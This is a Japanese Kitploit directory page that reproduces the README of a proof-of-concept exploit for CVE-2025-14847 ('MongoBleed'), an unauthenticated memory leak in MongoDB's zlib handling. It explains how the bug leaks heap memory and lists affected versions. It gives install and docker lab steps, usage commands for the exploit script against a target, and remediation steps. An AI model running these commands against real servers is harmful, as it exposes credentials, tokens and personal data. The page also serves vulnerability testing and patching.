Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-14847-MongoBleed-Exploit — CVE-2025-14847 MongoBleed - MongoDB メモリリーク脆弱性 PoC | Kitploit
ツール/GitHubGitHub/furkankayapinar/cve-2025-14847-mongobleed-exploit
メモリフォレンジック脆弱性分析エクスプロイト学習と教育データベースセキュリティラボと実践
GitHubfurkankayapinar/cve-2025-14847-mongobleed-exploit

CVE-2025-14847-MongoBleed-Exploit

CVE-2025-14847 MongoBleed - MongoDB メモリリーク脆弱性 PoC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
17ヶ月前未レビュー

CVE-2025-14847 - MongoBleed

Python License CVE

👨‍💻 著者: Furkan KAYAPINAR (@FurkanKAYAPINAR)

⚠️ 教育目的専用

MongoDB Server における認証不要の重大なメモリリーク脆弱性のためのラボ環境とエクスプロイトスクリプトです。


📋 目次

  • 脆弱性の概要
  • 影響を受けるバージョン
  • インストール
  • ラボ環境
  • 使用方法
  • 修正方法
  • 法的免責事項

🔴 脆弱性の概要

CVE-2025-14847 (MongoBleed) は、MongoDB Server の zlib 圧縮処理における、認証不要の重大なメモリリーク脆弱性です。

属性値
CVE IDCVE-2025-14847
CVSS スコア8.7 (High)
攻撃ベクトルNetwork
認証不要
開示日December 19, 2025

技術的詳細

この脆弱性は message_compressor_zlib.cpp に存在します。OP_COMPRESSED メッセージを処理する際に、以下の問題が発生します:

  1. 攻撃者が不整合な長さフィールドを持つ細工済みメッセージを送信する
  2. サーバーが宣言された uncompressedSize に基づいてバッファを割り当てる
  3. 実際に展開されたデータが宣言されたサイズよりも小さい
  4. サーバーが実際のデータ長ではなく、割り当てられたバッファ長を返す
  5. 初期化されていないヒープメモリが攻撃者に漏えいする

影響

漏えいしたデータには以下が含まれる可能性があります:

  • 🔑 認証トークンと秘密情報
  • 🗄️ データベースセッションデータ
  • 👤 PII(個人識別情報)
  • 🔐 API キーとパスワード
  • ⚙️ 設定情報

📦 影響を受けるバージョン


🚀 インストール

root@kitploit:~
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB

# Create virtual environment
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# venv\Scripts\activate   # Windows

# Install dependencies
pip install -r requirements.txt

🧪 ラボ環境

テスト用に脆弱な MongoDB インスタンスを起動します:

root@kitploit:~
cd lab

# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d

# Verify it's running
docker-compose ps

# Load sample data (optional)
./setup.sh load-data

# Stop lab
docker-compose down

💀 使用方法

基本エクスプロイト

root@kitploit:~
# Single target
python exploit/mongobleed.py -u 127.0.0.1

# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017

# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin

# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20

# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q

# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text

🔧 修正方法

オプション1: アップグレード(推奨)

root@kitploit:~
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27

オプション2: zlib 圧縮を無効化

root@kitploit:~
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd

# Or in mongod.conf
net:
  compression:
    compressors: snappy,zstd

修正の確認

root@kitploit:~
python remediation/verify_fix.py --target 127.0.0.1 --port 27017

⚖️ 法的免責事項

🚨 警告

このツールは教育および許可されたセキュリティテストの目的のみで提供されています。

  • コンピュータシステムへの不正アクセスは違法です
  • あなたの行動に対する責任はすべてあなた自身にあります
  • 作者は誤用に対するいかなる責任も負いません

本ツールを使用することで、対象システムをテストする適切な権限を有していることに同意したものとみなされます。


📚 参考情報

  • NVD - CVE-2025-14847
  • MongoDB Security Advisory
  • Varonis - MongoBleed Analysis

🤝 貢献

貢献を歓迎します! まず CONTRIBUTING.md をお読みください。


📄 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています - LICENSE ファイルを参照してください。

ツールをダウンロード
対象バージョン範囲修正済みバージョン
8.2.0 - 8.2.28.2.3
8.0.0 - 8.0.168.0.17
7.0.0 - 7.0.267.0.28
6.0.0 - 6.0.266.0.27
5.0.0 - 5.0.315.0.32
4.4.0 - 4.4.294.4.30
4.2, 4.0, 3.6 の全バージョンEOL - 直ちにアップグレード